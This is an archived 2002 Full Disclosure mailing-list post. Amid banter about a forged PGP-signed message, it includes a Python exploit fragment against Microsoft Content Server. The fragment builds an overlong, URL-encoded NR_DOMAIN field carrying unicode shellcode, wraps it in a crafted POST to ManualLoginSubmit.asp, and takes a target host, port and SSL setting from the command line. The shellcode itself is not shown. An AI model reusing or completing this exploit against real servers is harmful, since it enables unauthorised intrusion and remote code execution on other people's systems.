Full Disclosure mailing list archives
ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p
From: full-disclosure () lists netsys com (Dave Aitel)
Date: 14 Aug 2002 17:06:11 -0400
--=-hbPpmNmOVRvunQGqxXzl Content-Type: text/plain Content-Transfer-Encoding: quoted-printable At least you got the key id correct that time. It's not a valid signature, but at least it produces one less error message. -dave ObExploit: #fragment of my exploit for MS Content Server #the full exploit can be found at https://immunitysec.com/members/ #but if you're not a member, this might save you some time writing your #exploit. #returns the sploitstring def makesploit(self): header=3D"" body=3D"" body+=3D"NR_DOMAIN=3DWinNT%3A%2F%2F" #1 alignment byte so we are word aligned with the return addr attack=3D"" attack+=3D"A" attack+=3D"\x41\xb9"*4000 #unicode shellcode!! attack=3Dstroverwrite(attack,unicodeloop,1) print "length of overflow =3D "+str(len(attack)) attack=3Durllib.quote(attack) #print attack =20 body+=3Dattack =20 body+=3D"&NR_DOMAIN_LIST=3DWinNT%3A%2F%2FOAG4ZA0SR80BCRG&NR_USER=3D&NR_PASS= WORD=3D&submit1=3DContinue&NEXTURL=3D%2FNR%2FSystem%2FAccess%2FDefaultGuest= Login.asp" =20 =20 header+=3D"POST /NR/System/Access/ManualLoginSubmit.asp HTTP/1.1\r\n" header+=3D"Host: "+self.host+"\r\n" header+=3D"User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; Bob)\r\n" header+=3D"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=3D0.9,text/plain= ;q=3D0.8,video/x-mng,image/png,image/jpeg,image/gif;q=3D0.2,text/css,*/*;q= =3D0.1\r\n" header+=3D"Connection: keep-alive\r\n" header+=3D"Content-Type: application/x-www-form-urlencoded\r\n" header+=3D"Content-Length: "+str(len(body))+"\r\n" header+=3D"\r\n" =20 return header+body =20 =20 #this stuff happens. if __name__ =3D=3D '__main__': print "Running Microsoft Content Server exploit v 0.1" app =3D mscsexploit() if len(sys.argv) < 2: print "Usage: mycontent.py target [port] [ssl=3D0]" sys.exit() =20 app.setHost(sys.argv[1]) if len(sys.argv) > 2: app.setPort(int(sys.argv[2])) if len(sys.argv) > 3: app.setSSL(1) =20 app.run() On Wed, 2002-08-14 at 17:00, gobbles () hush com wrote:
=20 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 =20 or if you like =20 On 14 Aug 2002 16:36:09 -0400, Dave Aitel <dave () immunitysec com> wrote:On Wed, 2002-08-14 at 17:04, Charles Stevenson wrote:Gobbles, =20 On Wed, Aug 14, 2002 at 12:33:27PM -0700, gobbles () hush com wrote:GOBBLES just want to be cool whitehat like everyone else. Time for =
new
leaf time for six figure salary stock option naked breasted assistant.=20 Word to that my man! ;) =20 peace, coreYour message was signed, but the "GOBBLES" message was not and therefore just a forgery, most likely. BTW: http://www.immunitysec.com/vulnerabilities/ They arn't advisories, but if you need something to show to your boss about why you disconnected your Exchange/SQL server from the Internet, it's a good start.=20 Dave Aitel Immunity, Inc=20 -----BEGIN PGP SIGNATURE----- Version: Hush 2.1 Note: This signature can be verified at https://www.hushtools.com =20 wlwEARECABwFAj1H8s4VHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPl8QA nA66Z1OWuMnTnOhLlFQLa0nOHSZtAJsFKJo5AOe/7/OYbXpZRd3grAD8MQ=3D=3D =3Dxfu0 -----END PGP SIGNATURE----- =20 =20 Communicate in total privacy. Get your free encrypted email at https://www.hushmail.com/?l=3D2 =20 Looking for a good deal on a domain name? http://www.hush.com/partners/of=
fers.cgi?id=3Ddomainpeople
=20 =20
--=-hbPpmNmOVRvunQGqxXzl Content-Type: application/pgp-signature; name=signature.asc Content-Description: This is a digitally signed message part -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQA9WsZDB8JNm+PA+iURAiiVAJ9iL6BLrShaxaW4kJuT7LjtJ8QCGACdFWsL Ps/BuHtuIOHo6njXbzxoQDA= =MIej -----END PGP SIGNATURE----- --=-hbPpmNmOVRvunQGqxXzl--
Current thread:
- ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p, (continued)
- ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p Bugtraq storage account (Aug 14)
- ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p J.A. Terranson (Aug 14)
- ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p Jonathan Rickman (Aug 14)
- ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p Azerail (Aug 15)
- ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p ssinct (Aug 15)
- SPIKE v2.5 Nicolas Couture (Aug 14)
- RE: SPIKE v2.5 Nicolas Couture (Aug 14)
- ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p Gary E. Miller (Aug 14)
- ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p Dave Aitel (Aug 14)
- ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p Gary E. Miller (Aug 14)